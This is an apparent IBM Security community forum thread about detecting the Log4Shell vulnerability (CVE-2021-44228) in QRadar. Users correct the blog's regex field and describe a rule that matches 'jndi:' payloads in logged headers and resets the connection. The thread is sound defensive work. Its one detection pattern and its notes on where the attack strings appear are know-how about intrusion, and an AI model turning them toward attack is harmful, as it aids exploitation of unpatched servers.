We have seen the exploit in virtually every logged string from servers. I assume it is due to the way it is being exploited. Hostname, URL, referrer, agent and query are all being seen with the exploit.
I hated to do it, but I made a BB with a payload contains for jndi:, then added some logic for if firewall allowed then reset or dropped the connection.
Hey Adam!
------------------------------
Frank Eargle
------------------------------
Original Message:
Sent: Tue December 14, 2021 07:29 AM
From: Ariel Roitgarts
Subject: Detection of Log4Shell (CVE-2021-44228) using QRadar
Hi,
I believe there is a mistake in the examples of the building blocks in the blog post (the pictures).
You recommended to match the field "Username" to the regex in both examples, while I believe the correct field should be "User Agent" according to the latest exploit POC.
Please let me know if this is correct.
Thanks in advance,
Ariel
------------------------------
Ariel Roitgarts
Original Message:
Sent: Mon December 13, 2021 02:45 PM
From: Wendy Batten
Subject: Detection of Log4Shell (CVE-2021-44228) using QRadar
Updated blog by CTO Adam Frank: Detection of Log4Shell (CVE-2021-44228) using QRadar
------------------------------
Wendy Batten
Community Manager
IBM Security
Cambridge MA
wjbatten@us.ibm.com
------------------------------